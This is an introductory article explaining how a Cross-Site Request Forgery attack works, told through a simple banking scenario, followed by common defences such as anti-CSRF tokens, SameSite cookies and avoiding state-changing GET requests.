How a CSRF Attack Works

What is CSRF?

Cross-Site Request Forgery (CSRF) is a web security attack that tricks users into performing actions they never intended.
Attackers exploit the trust between a browser and a logged-in website to execute unauthorized requests.

Real-World CSRF Attack Example

1. User Logs Into a Trusted Website

Alice logs into her online banking account at bank.com. Her browser stores the login session using cookies, allowing her to stay authenticated while browsing.

2. Attacker Creates a Malicious Website

Mallory, the attacker, builds a fake webpage that contains a hidden request disguised as an image or button. Instead of loading a normal image, the request secretly attempts to transfer money from Alice’s account to Mallory’s account.

3. Alice Visits the Malicious Website

Mallory tricks Alice into opening the malicious webpage through a phishing email, social media link, or advertisement.

4. Browser Sends the Request Automatically

When Alice opens the page, her browser automatically sends the hidden request to bank.com along with her authentication cookies.

Since the request appears to come from Alice’s browser, the banking server treats it as legitimate.

5. Unauthorized Action Happens

The bank processes the request and transfers money to Mallory without Alice’s knowledge.

Impact of CSRF Attacks

CSRF attacks can cause serious security issues in web applications. Attackers may use them to:

• Transfer funds from user accounts
• Change passwords or email addresses
• Steal sensitive information
• Post unwanted messages or comments
• Modify account settings without permission

Common Methods to Prevent CSRF Attacks

Use Anti-CSRF Tokens

Developers can add unique CSRF tokens to forms and requests. The server checks the token before processing the request. If the token is missing or invalid, the request gets rejected.

Enable SameSite Cookies

The SameSite cookie attribute restricts browsers from sending cookies during cross-site requests. This reduces the chances of unauthorized requests reaching the server.

Validate User Requests

Applications should verify important actions before processing them. For example, websites can ask users to re-enter passwords or confirm transactions.

Avoid State-Changing GET Requests

Sensitive actions such as payments or password changes should use POST requests instead of GET requests.

Why CSRF Protection Matters

CSRF attacks target trusted user sessions and can silently perform harmful actions. Strong security measures such as CSRF tokens and SameSite cookies help developers protect user accounts and sensitive data from unauthorized access.